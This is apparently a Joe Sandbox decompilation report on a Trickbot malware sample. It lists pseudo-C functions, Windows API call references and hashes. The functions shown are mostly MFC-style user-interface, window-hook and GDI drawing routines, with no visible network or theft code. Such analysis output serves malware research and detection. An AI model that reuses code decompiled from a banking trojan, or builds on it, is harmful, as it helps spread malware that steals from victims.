                          						__eflags = _t116;
                          						if(_t116 == 0) {
                          							break;
                          						}
                          						__eflags = _t116 - _t198;
                          						if(_t116 == _t198) {
                          							L57:
                          							__eflags = _t208 - 0x100;
                          							if(_t208 < 0x100) {
                          								L59:
                          								__eflags = _t208 - 0x104;
                          								if(_t208 < 0x104) {
                          									L62:
                          									_t116 = 0;
                          									__eflags = 0;
                          									L63:
                          									__eflags =  *(_t198 + 0x25) & 0x00000004;
                          									if(( *(_t198 + 0x25) & 0x00000004) != 0) {
                          										goto L78;
                          									}
                          									__eflags = _t116;
                          									if(_t116 != 0) {
                          										L77:
                          										_t116 = E00419134(_t116);
                          										goto L78;
                          									}
                          									__eflags = _t208 - 0x201;
                          									if(_t208 == 0x201) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0x203;
                          									if(_t208 == 0x203) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0x204;
                          									if(_t208 == 0x204) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0x206;
                          									if(_t208 == 0x206) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0x207;
                          									if(_t208 == 0x207) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0x209;
                          									if(_t208 == 0x209) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa1;
                          									if(_t208 == 0xa1) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa3;
                          									if(_t208 == 0xa3) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa4;
                          									if(_t208 == 0xa4) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa6;
                          									if(_t208 == 0xa6) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa7;
                          									if(_t208 == 0xa7) {
                          										goto L77;
                          									}
                          									__eflags = _t208 - 0xa9;
                          									if(_t208 != 0xa9) {
                          										goto L78;
                          									}
                          									goto L77;
                          								}
                          								__eflags = _t208 - 0x107;
                          								if(_t208 > 0x107) {
                          									goto L62;
                          								}
                          								L61:
                          								_t116 = 1;
                          								goto L63;
                          							}
                          							__eflags = _t208 - 0x108;
                          							if(_t208 <= 0x108) {
                          								goto L61;
                          							}
                          							goto L59;
                          						}
                          						__eflags =  *(_t116 + 0x24) & 0x00000401;
                          						if(( *(_t116 + 0x24) & 0x00000401) != 0) {
                          							break;
                          						}
                          						_push(GetParent( *(_t116 + 0x1c)));
                          					}
                          					__eflags = _t116 - _t198;
                          					if(_t116 != _t198) {
                          						goto L78;
                          					}
                          					goto L57;
                          				}
                          			}
                          0x00416427
                          0x0041642c
                          0x00416430
                          0x00416435
                          0x00416438
                          0x00416440
                          0x00416443
                          0x00416446
                          0x00416474
                          0x00416479
                          0x004167ac
                          0x004167ac
                          0x00000000
                          0x004167ac
                          0x00416481
                          0x00416486
                          0x00000000
                          0x00000000
                          0x0041648e
                          0x00416493
                          0x00000000
                          0x00416499
                          0x00416499
                          0x0041649b
                          0x0041649b
                          0x004164a2
                          0x004164b5
                          0x00000000
                          0x004164b5
                          0x004164b8
                          0x004164ba
                          0x004164f5
                          0x004164f9
                          0x004164fc
                          0x00416502
                          0x00416507
                          0x00416509
                          0x0041650c
                          0x00416536
                          0x00416538
                          0x0041653e
                          0x00416541
                          0x00416543
                          0x00416545
                          0x00416548
                          0x00416551
                          0x00416551
                          0x00416553
                          0x00416557
                          0x0041655e
                          0x00416563
                          0x00416565
                          0x00416589
                          0x0041658f
                          0x00416592
                          0x00416598
                          0x004165a0
                          0x004165a5
                          0x004165a8
                          0x004165ab
                          0x004165ae
                          0x004165b4
                          0x004165c3
                          0x004165cd
                          0x004165d3
                          0x004165d5
                          0x004165e5
                          0x004165e5
                          0x004165eb
                          0x004165f4
                          0x004165fb
                          0x00416601
                          0x0041660f
                          0x00416614
                          0x0041661c
                          0x0041662c
                          0x00416631
                          0x00416637
                          0x00416639
                          0x0041663b
                          0x00416641
                          0x00416644
                          0x00416698
                          0x00416698
                          0x0041669b
                          0x004167a4
                          0x00416733
                          0x00416737
                          0x0041673c
                          0x00416743
                          0x00416743
                          0x00416749
                          0x00416756
                          0x00416756
                          0x00416761
                          0x0041676a
                          0x00416770
                          0x00416774
                          0x00000000
                          0x00416774
                          0x004166a6
                          0x004166b2
                          0x004166b2
                          0x004166b4
                          0x004166bc
                          0x004166bf
                          0x004166c2
                          0x004166c4
                          0x004166c4
                          0x004166c6
                          0x004166c6
                          0x004166d8
                          0x004166de
                          0x004166e2
                          0x004166f0
                          0x004166fb
                          0x00416701
                          0x00416704
                          0x00416707
                          0x00416717
                          0x00416717
                          0x0041672a
                          0x00000000
                          0x004166e4
                          0x004166e7
                          0x004166ec
                          0x004166ee
                          0x00416730
                          0x00416730
                          0x00000000
                          0x00416730
                          0x00000000
                          0x004166ee
                          0x00416646
                          0x00416646
                          0x0041664c
                          0x00000000

                          APIs
                          • __EH_prolog.LIBCMT ref: 00416427
                          • GetKeyState.USER32(00000001), ref: 00416474
                          • GetKeyState.USER32(00000002), ref: 00416481
                          • GetKeyState.USER32(00000004), ref: 0041648E
                          • GetParent.USER32(?), ref: 004164AF
                          • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 00416589
                          • SendMessageA.USER32(?,00000408,00000000,?), ref: 004165CD
                          • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004165E5
                          • ScreenToClient.USER32(?,?), ref: 00416601
                          • GetCursorPos.USER32(?), ref: 00416658
                          • SendMessageA.USER32(?,00000412,00000000,?), ref: 00416676
                          • SendMessageA.USER32(?,00000404,00000000,00000028), ref: 004166D8
                          • SendMessageA.USER32(?,00000401,00000001,00000000), ref: 004166FB
                          • SendMessageA.USER32(?,00000411,00000001,00000028), ref: 00416717
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0041672A
                          • SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 00416756
                          • SendMessageA.USER32(?,00000401,00000000,00000000), ref: 004167A4
                          • GetParent.USER32(?), ref: 004167D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
                          • String ID: ($($@
                          • API String ID: 986702660-2846432479
                          • Opcode ID: c4a27ce0fc41503571ae3ff46547edff6463ef07b9ffd30af0fb7e24fae11fc2
                          • Instruction ID: 683a017a1f253c99901c234bf21f6818f886763115cf72a948bc0ad45a94e06b
                          • Opcode Fuzzy Hash: c4a27ce0fc41503571ae3ff46547edff6463ef07b9ffd30af0fb7e24fae11fc2
                          • Instruction Fuzzy Hash: B4C18271A00314ABDF24AFA5CD85BEE77B5AB04304F12413BE915B62D1D778DC81CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 98%
                          			E00412CA0(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                          				struct tagPAINTSTRUCT _v64;
                          				long _v72;
                          				signed int _v76;
                          				signed int _t34;
                          				int _t69;
                          				struct HWND__* _t71;
                          				signed int _t73;
                          
                          				_t69 = _a8;
                          				_t82 = _t69 - 0x82;
                          				if(_t69 != 0x82) {
                          					_t71 = _a4;
                          					__eflags = GetPropA(_t71, 0);
                          					if(__eflags == 0) {
                          						__eflags = _t69 - 0xf1;
                          						_t34 = _t69;
                          						if(__eflags > 0) {
                          							__eflags = _t34 - 0xf3;
                          							if(_t34 == 0xf3) {
                          								goto L28;
                          							} else {
                          								__eflags = _t34 - 0x1943;
                          								if(__eflags < 0) {
                          									goto L11;
                          								} else {
                          									__eflags = _t34 - 0x1944;
                          									if(__eflags <= 0) {
                          										 *_a16 = 1;
                          										return 0x3e8;
                          									} else {
                          										goto L11;
                          									}
                          								}
                          							}
                          						} else {
                          							if(__eflags == 0) {
                          								L28:
                          								_t73 = 4;
                          								goto L29;
                          							} else {
                          								_t34 = _t34 - 7;
                          								__eflags = _t34 - 8;
                          								if(__eflags > 0) {
                          									L11:
                          									return CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
                          								} else {
                          									switch( *((intOrPtr*)(_t34 * 4 +  &M00412F50))) {
                          										case 0:
                          											__ebp = 0x16;
                          											goto L29;
                          										case 1:
                          											__eax = GetWindowLongA(__esi, 0xfffffff0);
                          											__al = __al & 0x0000001f;
                          											__eflags = __al - 9;
                          											if(__al == 9) {
                          												__eax = SendMessageA(__esi, 0xf3, 0, 0);
                          											}
                          											__ebp = 0;
                          											goto L29;
                          										case 2:
                          											goto L11;
                          										case 3:
                          											__ebp = 6;
                          											goto L29;
                          										case 4:
                          											__eax = GetWindowLongA(__esi, 0xfffffff0);
                          											__eflags = __eax & 0x10000000;
                          											if((__eax & 0x10000000) == 0) {
                          												L20:
                          												__ebp = 0x16;
                          											} else {
                          												__al = __al & 0x0000001f;
                          												__eflags = __al - 7;
                          												if(__al != 7) {
                          													goto L20;
                          												} else {
                          													__ebp = 0x22;
                          												}
                          											}
                          											L29:
                          											_v72 = SendMessageA(_t71, 0xf2, 0, 0);
                          											_t36 = GetWindowLongA(_t71, 0xfffffff0);
                          											__eflags = _t36 & 0x10000000;
                          											if(__eflags == 0) {
                          												goto L11;
                          											} else {
                          												__eflags = _t69 - 7;
                          												if(__eflags != 0) {
                          													_t52 = _t36 & 0xefffffff;
                          													__eflags = _t52;
                          													SetWindowLongA(_t71, 0xfffffff0, _t52);
                          												}
                          												_v72 = CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
                          												__eflags = _t69 - 7;
                          												if(_t69 != 7) {
                          													_t50 = GetWindowLongA(_t71, 0xfffffff0) | 0x10000000;
                          													__eflags = _t50;
                          													SetWindowLongA(_t71, 0xfffffff0, _t50);
                          												}
                          												_t63 = SendMessageA(_t71, 0xf2, 0, 0);
                          												__eflags = _t69 - 0xf3;
                          												if(_t69 == 0xf3) {
                          													L36:
                          													__eflags = _t63 - _v76;
                          													if(_t63 != _v76) {
                          														goto L37;
                          													}
                          												} else {
                          													__eflags = _t69 - 0xf1;
                          													if(_t69 != 0xf1) {
                          														L37:
                          														_t70 = GetDC(_t71);
                          														__eflags = _t70;
                          														if(_t70 != 0) {
                          															_t64 = _t63 ^ _v76;
                          															__eflags = _t64 & 0x00000003;
                          															if((_t64 & 0x00000003) != 0) {
                          																_t73 = _t73 | 0x00000004;
                          																__eflags = _t73;
                          															}
                          															_t66 = _t64 & 0x00000008 | _t73;
                          															__eflags = _t66;
                          															ExcludeUpdateRgn(_t70, _t71);
                          															_push(_t66);
                          															E00412750(_t71, _t70);
                          															ReleaseDC(_t71, _t70);
                          														}
                          													} else {
                          														goto L36;
                          													}
                          												}
                          												return _v72;
                          											}
                          											goto L43;
                          										case 5:
                          											__edi = SendMessageA(__esi, 0xf2, 0, 0);
                          											__ebx = _a12;
                          											__ebp = __ebx;
                          											__eflags = __ebp;
                          											if(__ebp == 0) {
                          												__eax =  &_v64;
                          												__ebp = BeginPaint;
                          												__ebp = BeginPaint(__esi,  &_v64);
                          											}
                          											__eax = GetWindowLongA(__esi, 0xfffffff0);
                          											__eflags = __eax & 0x10000000;
                          											if((__eax & 0x10000000) != 0) {
                          												__edi = __edi & 0x00000008;
                          												__edi = __edi | 0x00000006;
                          												__eflags = __edi;
                          												_push(__edi);
                          												__eax = E00412750(__esi, __ebp);
                          											}
                          											__eflags = __ebx;
                          											if(__ebx == 0) {
                          												 &_v64 = EndPaint(__esi,  &_v64);
                          											}
                          											__eax = 0;
                          											__eflags = 0;
                          											return 0;
                          											goto L43;
                          									}
                          								}
                          							}
                          						}
                          					} else {
                          						return CallWindowProcA(E00410610(__eflags, _t71, 0), _t71, _t69, _a12, _a16);
                          					}
                          				} else {
                          					return E00410840(_t82, _a4, _t69, _a12, _a16, 0);
                          				}
                          				L43:
                          			}

                          APIs
                          • GetPropA.USER32(?,00000000), ref: 00412CE5
                          • CallWindowProcA.USER32(00000000), ref: 00412D0D
                            • Part of subcall function 00410840: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 00410866
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041087E
                            • Part of subcall function 00410840: RemovePropA.USER32(?,00000000), ref: 0041088A
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Prop$CallProcRemoveWindow
                          • String ID:
                          • API String ID: 2276450057-0
                          • Opcode ID: b6a9b017ea78a4852f055930b32688fa3609341f6cba679b96f812213a9223c1
                          • Instruction ID: db619e21cc1ccbdb72307f1674bd17e4a1efd94b9e177812b332f8afb0fc7592
                          • Opcode Fuzzy Hash: b6a9b017ea78a4852f055930b32688fa3609341f6cba679b96f812213a9223c1
                          • Instruction Fuzzy Hash: 326145726443147FD621AB14ED48FEF3768EB86321F100526FA00C23D1DBE89D9686BE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E00418B0A(void* __edx, void* _a4, int _a8, long _a12) {
                          				intOrPtr _v8;
                          				signed int _v12;
                          				char _v20;
                          				void* __ebp;
                          				intOrPtr _t50;
                          				signed int _t52;
                          				long _t53;
                          				long _t62;
                          				long _t70;
                          				char _t71;
                          				long _t73;
                          				CHAR* _t76;
                          				int _t83;
                          				signed char _t92;
                          				void* _t93;
                          				void* _t95;
                          				long _t96;
                          				intOrPtr _t99;
                          				intOrPtr* _t101;
                          				intOrPtr _t102;
                          				CHAR* _t104;
                          				long _t105;
                          
                          				_t93 = __edx;
                          				_t50 = E00432D4E(0x44b2ec, E00430506);
                          				_v8 = _t50;
                          				if(_a4 != 3) {
                          					return CallNextHookEx( *(_t50 + 0x2c), _a4, _a8, _a12);
                          				}
                          				_t101 =  *((intOrPtr*)(_t50 + 0x14));
                          				_t95 =  *_a12;
                          				_t52 =  *(E00432562() + 0x14) & 0x000000ff;
                          				_t83 = _a8;
                          				_v12 = _t52;
                          				if(_t101 != 0 || ( *(_t95 + 0x23) & 0x00000040) == 0 && _t52 == 0) {
                          					if( *0x44b4dc == 0) {
                          						L10:
                          						if(_t101 == 0) {
                          							_t53 = GetWindowLongA(_t83, 0xfffffffc);
                          							_a4 = _t53;
                          							if(_t53 != 0) {
                          								_t104 = "AfxOldWndProc423";
                          								if(GetPropA(_t83, _t104) == 0) {
                          									SetPropA(_t83, _t104, _a4);
                          									if(GetPropA(_t83, _t104) == _a4) {
                          										GlobalAddAtomA(_t104);
                          										_t62 = E00418A8E;
                          										if( *((intOrPtr*)(_v8 + 0x28)) == 0) {
                          											_t62 = E0041892F;
                          										}
                          										SetWindowLongA(_t83, 0xfffffffc, _t62);
                          									}
                          								}
                          							}
                          							goto L27;
                          						}
                          						E00418892(_t101, _t83);
                          						 *((intOrPtr*)( *_t101 + 0x50))();
                          						_a8 =  *((intOrPtr*)( *_t101 + 0x80))();
                          						if( *0x44b354 != 0 || _v12 != 0) {
                          							L18:
                          							_t105 = E00418929();
                          							_t70 = SetWindowLongA(_t83, 0xfffffffc, _t105);
                          							if(_t70 == _t105) {
                          								goto L20;
                          							}
                          							goto L19;
                          						} else {
                          							_t99 =  *0x44b4d8; // 0x1cd370
                          							if(_t99 == 0 ||  *((intOrPtr*)(_t99 + 0x20)) == 0) {
                          								goto L18;
                          							} else {
                          								_push(0);
                          								_push(0);
                          								_push(0x36f);
                          								_push(_t83);
                          								_push(_t101);
                          								_t71 = E0041868C(_t93);
                          								_v20 = _t71;
                          								if(_t71 == 0) {
                          									goto L18;
                          								}
                          								_a4 = E00418929();
                          								_t73 = GetWindowLongA(_t83, 0xfffffffc);
                          								asm("sbb esi, esi");
                          								 *((intOrPtr*)(_t99 + 0x20))(_t83, _v20);
                          								if( ~(_t73 - _a4) + 1 != 0) {
                          									L20:
                          									_t102 = _v8;
                          									 *(_t102 + 0x14) =  *(_t102 + 0x14) & 0x00000000;
                          									goto L28;
                          								}
                          								_t70 = SetWindowLongA(_t83, 0xfffffffc, _a4);
                          								L19:
                          								 *_a8 = _t70;
                          								goto L20;
                          							}
                          						}
                          					}
                          					if((GetClassLongA(_t83, 0xffffffe6) & 0x00010000) != 0) {
                          						goto L27;
                          					}
                          					_t76 =  *(_t95 + 0x28);
                          					_t92 = _t76 >> 0x10;
                          					if(_t92 == 0) {
                          						_v20 = _v20 & _t92;
                          						GlobalGetAtomNameA( *(_t95 + 0x28),  &_v20, 5);
                          						_t76 =  &_v20;
                          					}
                          					if(lstrcmpiA(_t76, ?str?) == 0) {
                          						goto L27;
                          					} else {
                          						goto L10;
                          					}
                          				} else {
                          					L27:
                          					_t102 = _v8;
                          					L28:
                          					_t96 = CallNextHookEx( *(_t102 + 0x2c), 3, _t83, _a12);
                          					if(_v12 != 0) {
                          						UnhookWindowsHookEx( *(_t102 + 0x2c));
                          						 *(_t102 + 0x2c) =  *(_t102 + 0x2c) & 0x00000000;
                          					}
                          					return _t96;
                          				}
                          			}

                          APIs
                            • Part of subcall function 00432D4E: TlsGetValue.KERNEL32(0044B4A0,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000,?,00413D3C,00000000,00000000,00000000,00000000), ref: 00432D8D
                          • CallNextHookEx.USER32(?,00000003,?,?), ref: 00418B34
                          • GetClassLongA.USER32(?,000000E6), ref: 00418B7B
                          • GlobalGetAtomNameA.KERNEL32(?,?,00000005), ref: 00418BA7
                          • lstrcmpiA.KERNEL32(?,ime,?,?,?,Function_00030506), ref: 00418BB6
                          • GetWindowLongA.USER32(?,000000FC), ref: 00418C29
                          • SetWindowLongA.USER32(?,000000FC,00000000), ref: 00418C4A
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Long$Window$AtomCallClassGlobalHookNameNextValuelstrcmpi
                          • String ID: AfxOldWndProc423$ime
                          • API String ID: 3731301195-104836986
                          • Opcode ID: 1593092a398c9522309a9bb4c80d461e69680f9ea6813642c299e1df01d6fcc1
                          • Instruction ID: 2fbb638aa9d382519783bebb2f293646e989fb4ea4d3784b0d2e66ed29f98d3c
                          • Opcode Fuzzy Hash: 1593092a398c9522309a9bb4c80d461e69680f9ea6813642c299e1df01d6fcc1
                          • Instruction Fuzzy Hash: 29518C71501214BBCB119F64DC48BAB7BA9BF08361F14462AF915A6291EB78DD80CBE8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0042C7B3(intOrPtr* __ecx, void* __eflags) {
                          				void* _t146;
                          				void* _t150;
                          				void* _t159;
                          				void* _t165;
                          				intOrPtr* _t246;
                          				RECT* _t250;
                          				void* _t255;
                          
                          				E00405340(E00437F30, _t255);
                          				_t246 = __ecx;
                          				E004046B6(_t255 - 0x2c);
                          				 *(_t255 - 0x2c) = 0x43aee4;
                          				 *((intOrPtr*)(_t255 - 4)) = 0;
                          				E004046B6(_t255 - 0x1c);
                          				 *(_t255 - 0x1c) = 0x43aee4;
                          				 *((char*)(_t255 - 4)) = 1;
                          				E004046B6(_t255 - 0x14);
                          				 *(_t255 - 0x14) = 0x43aee4;
                          				 *((char*)(_t255 - 4)) = 2;
                          				E0042179E(_t255 - 0x1c, CreateRectRgnIndirect( *(_t255 + 8)));
                          				CopyRect(_t255 - 0x44,  *(_t255 + 8));
                          				InflateRect(_t255 - 0x44,  ~( *(_t255 + 0xc)),  ~( *(_t255 + 0x10)));
                          				IntersectRect(_t255 - 0x44, _t255 - 0x44,  *(_t255 + 8));
                          				E0042179E(_t255 - 0x14, CreateRectRgnIndirect(_t255 - 0x44));
                          				E0042179E(_t255 - 0x2c, CreateRectRgn(0, 0, 0, 0));
                          				asm("sbb eax, eax");
                          				asm("sbb ecx, ecx");
                          				CombineRgn( *(_t255 - 0x28),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                          				_t261 =  *((intOrPtr*)(_t255 + 0x20));
                          				if( *((intOrPtr*)(_t255 + 0x20)) == 0) {
                          					 *((intOrPtr*)(_t255 + 0x20)) = E0042C740(_t261);
                          				}
                          				if( *((intOrPtr*)(_t255 + 0x24)) == 0) {
                          					 *((intOrPtr*)(_t255 + 0x24)) =  *((intOrPtr*)(_t255 + 0x20));
                          				}
                          				E004046B6(_t255 - 0x24);
                          				 *(_t255 - 0x24) = 0x43aee4;
                          				 *((char*)(_t255 - 4)) = 3;
                          				E004046B6(_t255 - 0x34);
                          				 *((intOrPtr*)(_t255 - 0x34)) = 0x43aee4;
                          				_t250 =  *(_t255 + 0x14);
                          				 *((char*)(_t255 - 4)) = 4;
                          				if(_t250 != 0) {
                          					E0042179E(_t255 - 0x24, CreateRectRgn(0, 0, 0, 0));
                          					SetRectRgn( *(_t255 - 0x18),  *_t250, _t250->top, _t250->right, _t250->bottom);
                          					CopyRect(_t255 - 0x44, _t250);
                          					InflateRect(_t255 - 0x44,  ~( *(_t255 + 0x18)),  ~( *(_t255 + 0x1c)));
                          					IntersectRect(_t255 - 0x44, _t255 - 0x44, _t250);
                          					SetRectRgn( *(_t255 - 0x10),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c),  *(_t255 - 0x38));
                          					asm("sbb eax, eax");
                          					asm("sbb ecx, ecx");
                          					CombineRgn( *(_t255 - 0x20),  ~(_t255 - 0x1c) &  *(_t255 - 0x18),  ~(_t255 - 0x14) &  *(_t255 - 0x10), 3);
                          					if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) ==  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4))) {
                          						E0042179E(_t255 - 0x34, CreateRectRgn(0, 0, 0, 0));
                          						asm("sbb eax, eax");
                          						asm("sbb ecx, ecx");
                          						CombineRgn( *(_t255 - 0x30),  ~(_t255 - 0x24) &  *(_t255 - 0x20),  ~(_t255 - 0x2c) &  *(_t255 - 0x28), 3);
                          					}
                          				}
                          				if( *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x20)) + 4)) !=  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x24)) + 4)) && _t250 != 0) {
                          					E00421288(_t246, _t255 - 0x24);
                          					 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                          					_t165 = E00420EC2(_t246,  *((intOrPtr*)(_t255 + 0x24)));
                          					PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                          					E00420EC2(_t246, _t165);
                          				}
                          				_t146 = _t255 - 0x34;
                          				if( *(_t255 - 0x30) == 0) {
                          					_t146 = _t255 - 0x2c;
                          				}
                          				E00421288(_t246, _t146);
                          				 *((intOrPtr*)( *_t246 + 0x50))(_t255 - 0x44);
                          				_t150 = E00420EC2(_t246,  *((intOrPtr*)(_t255 + 0x20)));
                          				_t251 = _t150;
                          				PatBlt( *(_t246 + 4),  *(_t255 - 0x44),  *(_t255 - 0x40),  *(_t255 - 0x3c) -  *(_t255 - 0x44),  *(_t255 - 0x38) -  *(_t255 - 0x40), 0x5a0049);
                          				if(_t150 != 0) {
                          					E00420EC2(_t246, _t251);
                          				}
                          				E00421288(_t246, 0);
                          				 *((intOrPtr*)(_t255 - 0x34)) = 0x43aed4;
                          				 *((char*)(_t255 - 4)) = 5;
                          				E004217F5(_t255 - 0x34);
                          				 *(_t255 - 0x24) = 0x43aed4;
                          				 *((char*)(_t255 - 4)) = 6;
                          				E004217F5(_t255 - 0x24);
                          				 *(_t255 - 0x14) = 0x43aed4;
                          				 *((char*)(_t255 - 4)) = 7;
                          				E004217F5(_t255 - 0x14);
                          				 *(_t255 - 0x1c) = 0x43aed4;
                          				 *((char*)(_t255 - 4)) = 8;
                          				E004217F5(_t255 - 0x1c);
                          				 *(_t255 - 0x2c) = 0x43aed4;
                          				 *((intOrPtr*)(_t255 - 4)) = 9;
                          				_t159 = E004217F5(_t255 - 0x2c);
                          				 *[fs:0x0] =  *((intOrPtr*)(_t255 - 0xc));
                          				return _t159;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 0042C7B8
                          • CreateRectRgnIndirect.GDI32(?), ref: 0042C7FB
                          • CopyRect.USER32(?,?), ref: 0042C811
                          • InflateRect.USER32(?,?,?), ref: 0042C827
                          • IntersectRect.USER32(?,?,?), ref: 0042C838
                          • CreateRectRgnIndirect.GDI32(?), ref: 0042C842
                          • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C855
                          • CombineRgn.GDI32(?,?,?,00000003), ref: 0042C87F
                          • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C8CA
                          • SetRectRgn.GDI32(?,?,?,?,?), ref: 0042C8E7
                          • CopyRect.USER32(?,?), ref: 0042C8F2
                          • InflateRect.USER32(?,?,?), ref: 0042C908
                          • IntersectRect.USER32(?,?,?), ref: 0042C917
                          • SetRectRgn.GDI32(?,?,?,?,?), ref: 0042C92C
                          • CombineRgn.GDI32(?,?,?,00000003), ref: 0042C94D
                          • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0042C965
                          • CombineRgn.GDI32(?,?,?,00000003), ref: 0042C98F
                            • Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
                            • Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
                            • Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798
                            • Part of subcall function 00421288: SelectClipRgn.GDI32(?,00000000), ref: 004212AA
                            • Part of subcall function 00421288: SelectClipRgn.GDI32(?,?), ref: 004212C0
                            • Part of subcall function 00420EC2: SelectObject.GDI32(?,00000000), ref: 00420EE4
                            • Part of subcall function 00420EC2: SelectObject.GDI32(?,?), ref: 00420EFA
                          • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0042C9E5
                          • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0042CA39
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
• Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
• Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
                          • String ID:
                          • API String ID: 4023391435-0
                          • Opcode ID: 452eb11c3f780d48d282d0b538d2b264e2dd20c0d380a7e524e99793db555866
                          • Instruction ID: 2604795a96ba41c5c42bdad28226182bbeba2e24f2e28d12491b3412699efff8
                          • Opcode Fuzzy Hash: 452eb11c3f780d48d282d0b538d2b264e2dd20c0d380a7e524e99793db555866
                          • Instruction Fuzzy Hash: 12A107B2A00119EFCF05DFA4D989DEEBBB9FF58304F10411AF506A2251DB796E05CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 97%
                          			E0042C376(void* __ecx, void* __edx, void* __edi) {
                          				int* _v8;
                          				struct HWND__* _v12;
                          				struct HWND__* _v16;
                          				struct tagRECT _v32;
                          				struct tagRECT _v48;
                          				struct HWND__* _t65;
                          				struct HWND__* _t79;
                          				struct HWND__* _t82;
                          				intOrPtr _t88;
                          				struct HWND__* _t95;
                          				struct HWND__* _t110;
                          				void* _t126;
                          				void* _t127;
                          				int* _t130;
                          				void* _t131;
                          
                          				_t127 = __edi;
                          				_t126 = __edx;
                          				_t131 = __ecx;
                          				if( *((intOrPtr*)(__ecx + 0x80)) == 0) {
                          					_t110 = GetDlgItem( *(__ecx + 0x1c), 0x3020);
                          					_t133 = _t110;
                          					if(_t110 != 0) {
                          						E004184E5(_t110, 0x200, 0, 0);
                          					}
                          				}
                          				_push(_t127);
                          				if(( *(E0042BD0C(_t131, _t133) + 4) & 0x00002020) != 0) {
                          					L10:
                          					_t65 = E004187B4(_t131);
                          					_t141 =  *((intOrPtr*)(_t131 + 0x84));
